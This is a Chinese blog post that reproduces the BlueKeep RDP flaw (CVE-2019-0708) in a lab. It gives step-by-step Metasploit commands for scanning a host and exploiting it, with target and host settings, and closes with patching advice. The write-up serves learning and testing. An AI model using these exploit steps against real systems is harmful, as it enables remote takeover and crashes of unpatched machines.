遠程桌面代碼執行漏洞復現(CVE-2019-0708)

前言

最近在學習和復現漏洞,藉此記錄一下~~




目錄導航


漏洞危害就不說了,你們都懂得,下面是漏洞的影響範圍~~

CVE-2019-0708 漏洞影響範圍:

Windows 7(已停止維護)
Windows Server 2008 R2
Windows Server 2008 Windows
Server 2003(已停止維護)
Windows XP(已停止維護)

漏洞復現環境:ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/



一. 漏洞探測

命令行輸入msfconsole打開msf控制檯,隨後搜索cve-2019-0708漏洞利用模塊,如下:

在這裏插入圖片描述

可以看到有auxiliary(輔助)模塊和exploit(攻擊)模塊,而我們現在要使用的是模塊一,用來進行對CVE-2019-0708的漏洞探測

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

在這裏插入圖片描述

掃描結果顯示該主機很容易受到CVE-2019-0708的攻擊,到此可進行下一步漏洞利用了。



二. 漏洞利用

接下來要使用rce漏洞利用模塊,如不存在該模塊,可嘗試更新msf,如下:

msf更新:apt-get  install metasploit-framework
		gem install bundler

需要設置的options:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  # rce漏洞利用模塊
show targets 
set target 4  # 選擇目標主機類型  這裏這裏要選擇正確的target 不然會導致受害機藍屏!!
set rhost 172.20.60.14 # 這裏設置受害機
run

經過前前後後10多次的嘗試,測試期間換了多個鏡像文件和msf環境,實驗結果仍舊是藍屏… ,並未達到rec利用,最後嘗試使用下面的鏡像環境能完成復現實驗。

ed2k://|file|cn_windows_7_enterprise_x64_dvd_x15-70741.iso|3203516416|876DCF115C2EE28D74B178BE1A84AB3B|/

失敗的樣子:
在這裏插入圖片描述
成功的樣子:在這裏插入圖片描述



修復建議

1.更新漏洞補丁
2.使用殺軟等專業的防護軟件系統,畢竟人力有限,總不可能24小時盯着個人電腦或關鍵服務器,這時候,殺軟等防護硬軟件將會是我們的第一道防線

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章